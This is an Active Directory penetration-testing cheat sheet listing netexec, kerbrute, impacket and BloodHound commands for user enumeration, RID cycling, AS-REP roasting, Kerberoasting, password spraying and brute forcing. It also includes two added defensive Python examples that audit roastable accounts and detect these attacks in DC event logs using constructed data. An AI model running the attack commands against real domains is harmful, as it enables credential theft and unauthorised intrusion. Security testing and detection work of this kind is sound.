Active Directory
AD Enumeration
Basic Recon
netexec smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>
Shares
# null session
netexec smb <IP> -u '' -p '' --shares
# guest
netexec smb <IP> -u 'guest' -p '' --shares
User Enumeration
kerbrute userenum -d <domain> [--dc <target>] users.txt
netexec smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>
RID Cycling
netexec smb <target> [-u 'guest' -p ''] --rid-brute
lookupsid.py [-no-pass] [[domain/]guest:@]<target>
AS-REP Roast
With a valid username list
GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/
With valid credentials
GetNPUsers.py '<domain>/<user>:<password>' -request
netexec ldap <target> -u '<user>' -p '<password>' --asreproast asreproast.txt
Kerberoast
If you get this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
it means your host's clock is too far from the DC's (Kerberos tolerates 5 minutes by default), so synchronise the host's time with the DC. There are a few options:
ntpdate <target>
rdate -n <target>
GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>
netexec ldap <target> -u '<user>' -p '<password>' --kerberoasting kerberoasting.txt
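Added example, not from the original notes: the same two exposures the AS-REP roast and Kerberoast commands above look for, checked from the defender's side on the LDAP attributes of user objects (DONT_REQ_PREAUTH bit in userAccountControl, SPN on a user account), with a remediation hint per finding. SAMPLE_ENTRIES is constructed data; the flag values and LDAP filters are the standard AD ones.

```python
"""Audit which user objects are exposed to AS-REP roasting (no Kerberos
pre-authentication) and Kerberoasting (an SPN on a user account), working from
the LDAP attributes of each user. Added example, not from the original notes;
SAMPLE_ENTRIES is constructed data shaped like the attributes an LDAP search
returns, and the flag values are the well-known userAccountControl bits."""

# userAccountControl bits (AD schema)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304

# LDAP filters that select the same two populations directly on the DC
ASREP_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")
SPN_FILTER = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"

# Constructed sample: a few user objects as an LDAP search would return them
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200, "adminCount": 1,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.example:1433"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x400200, "adminCount": 0},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202,  # disabled
     "servicePrincipalName": ["HTTP/legacy.corp.example"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/ws01.corp.example"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
]


def is_asrep_roastable(entry):
    """Enabled account with DONT_REQ_PREAUTH set: its AS-REP can be obtained
    without a password, which is exactly what the commands above rely on."""
    uac = int(entry.get("userAccountControl", 0))
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE)


def is_kerberoastable(entry):
    """Enabled user (not a machine account, not krbtgt) carrying an SPN: any
    domain user can request a service ticket keyed to its password."""
    sam = entry.get("sAMAccountName", "")
    uac = int(entry.get("userAccountControl", 0))
    if sam.endswith("$") or sam.lower() == "krbtgt":
        return False
    if uac & UF_ACCOUNTDISABLE:
        return False
    return bool(entry.get("servicePrincipalName"))


def remediation(reasons):
    """Remediation steps matching each reason code."""
    steps = []
    if "no-preauth" in reasons:
        steps.append("clear 'Do not require Kerberos preauthentication' on the account")
    if "spn" in reasons:
        steps.append("move the service to a gMSA or set a long random password")
    return steps


def audit(entries):
    """Return one finding per exposed account, privileged (adminCount=1) first."""
    findings = []
    for e in entries:
        reasons = []
        if is_asrep_roastable(e):
            reasons.append("no-preauth")
        if is_kerberoastable(e):
            reasons.append("spn")
        if reasons:
            findings.append({
                "account": e["sAMAccountName"],
                "reasons": reasons,
                "privileged": int(e.get("adminCount", 0)) == 1,
                "fix": remediation(reasons),
            })
    findings.sort(key=lambda f: (not f["privileged"], f["account"]))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_ENTRIES):
        print(finding)
```

Disabled accounts, machine accounts and krbtgt are skipped on purpose: they are not what the roasting commands above target, and flagging them only adds noise to the remediation list.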
Password Spraying / Brute Forcing
Password spraying
netexec smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'
Brute forcing
netexec smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'
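Added example, not from the original notes: detection logic for the AS-REP roast, Kerberoast and password spraying sections above, run over DC Security events. AS-REP roasting shows as 4768 with Pre-Authentication Type 0, Kerberoasting as a burst of RC4 (0x17) 4769 service tickets for user-account SPNs from one source, and spraying as one source failing against many distinct accounts inside a short window (4771 with status 0x18 for Kerberos, 4776 with error 0xC000006A for NTLM). The field names are those events' own; SAMPLE_EVENTS and the thresholds are constructed.

```python
"""Detection over Windows Security events from a DC for the activities in the
AS-REP roast, Kerberoast and password spraying sections. Added example, not
from the original notes; SAMPLE_EVENTS is constructed data and the thresholds
are starting points to tune per environment."""
from collections import defaultdict
from datetime import datetime, timedelta


def ev(event_id, when, user, source, **fields):
    """Build a flattened event record (constructed, not exported from a real log)."""
    return {"EventID": event_id, "TimeCreated": when, "TargetUserName": user,
            "IpAddress": source, **fields}


SAMPLE_EVENTS = [
    ev(4768, "2024-05-01T09:00:00", "jdoe", "10.0.0.50", PreAuthType="0", TicketEncryptionType="0x17"),
    ev(4768, "2024-05-01T09:00:01", "alice", "10.0.0.7", PreAuthType="2", TicketEncryptionType="0x12"),
    ev(4769, "2024-05-01T09:01:00", "bob", "10.0.0.50", ServiceName="svc_sql", TicketEncryptionType="0x17"),
    ev(4769, "2024-05-01T09:01:01", "bob", "10.0.0.50", ServiceName="svc_web", TicketEncryptionType="0x17"),
    ev(4769, "2024-05-01T09:01:02", "bob", "10.0.0.50", ServiceName="svc_backup", TicketEncryptionType="0x17"),
    ev(4769, "2024-05-01T09:01:03", "bob", "10.0.0.50", ServiceName="WS01$", TicketEncryptionType="0x17"),
    ev(4769, "2024-05-01T09:01:04", "alice", "10.0.0.7", ServiceName="svc_sql", TicketEncryptionType="0x12"),
    ev(4771, "2024-05-01T09:02:00", "alice", "10.0.0.7", Status="0x18"),
    *[ev(4771, f"2024-05-01T09:03:{i * 10:02d}", u, "10.0.0.50", Status="0x18")
      for i, u in enumerate(["amy", "ben", "cat", "dan", "eve"])],
    ev(4771, "2024-05-01T09:03:50", "nosuchuser", "10.0.0.50", Status="0x6"),
    ev(4776, "2024-05-01T09:04:00", "bob", "", Workstation="WS-ATTACK", Status="0xC000006A"),
    ev(4776, "2024-05-01T09:04:02", "carol", "", Workstation="WS-ATTACK", Status="0xC000006A"),
]


def when(e):
    return datetime.fromisoformat(e["TimeCreated"])


def asrep_roast_indicators(events):
    """Accounts whose TGT was issued without pre-authentication (4768, PreAuthType 0)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})


def kerberoast_indicators(events, min_services=3):
    """Sources that pulled RC4 service tickets for several distinct user-account SPNs."""
    by_source = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e.get("TicketEncryptionType", "").lower() != "0x17":
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine-account tickets are not a Kerberoast target; keep the signal on user SPNs
        by_source[e["IpAddress"]].add(svc)
    return {src: sorted(s) for src, s in by_source.items() if len(s) >= min_services}


def failure_source(e):
    """Source of a bad-password failure, or None if the event is not one."""
    if e["EventID"] == 4771 and e.get("Status") == "0x18":
        return e["IpAddress"]
    if e["EventID"] == 4776 and e.get("Status") == "0xC000006A":
        return e.get("Workstation", "")
    return None


def spray_indicators(events, window=timedelta(minutes=5), min_accounts=5):
    """Sources that failed against >= min_accounts distinct users inside one window."""
    by_source = defaultdict(list)
    for e in sorted(events, key=when):
        src = failure_source(e)
        if src is not None:
            by_source[src].append((when(e), e["TargetUserName"]))
    hits = {}
    for src, attempts in by_source.items():
        for start, _ in attempts:  # slide the window from each failure
            users = {u for t, u in attempts if start <= t <= start + window}
            if len(users) >= min_accounts:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits


if __name__ == "__main__":
    print("AS-REP roast:", asrep_roast_indicators(SAMPLE_EVENTS))
    print("Kerberoast:", kerberoast_indicators(SAMPLE_EVENTS))
    print("Spray:", spray_indicators(SAMPLE_EVENTS))
```

Unknown-user failures (4771 status 0x6) are deliberately left out of the spray count so that the username enumeration noise from the sections above does not inflate it; count them separately if you want to see enumeration as well.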
BloodHound
BloodHound Python
# legacy
bloodhound-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
# community edition
bloodhound-ce-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
Netexec
netexec ldap <target> -u '<user>' -p '<password>' --bloodhound -c All
SharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
# exe
.\SharpHound.exe -CollectionMethods All
# ps1
. .\SharpHound.ps1; Invoke-BloodHound -CollectionMethods All -OutputDirectory .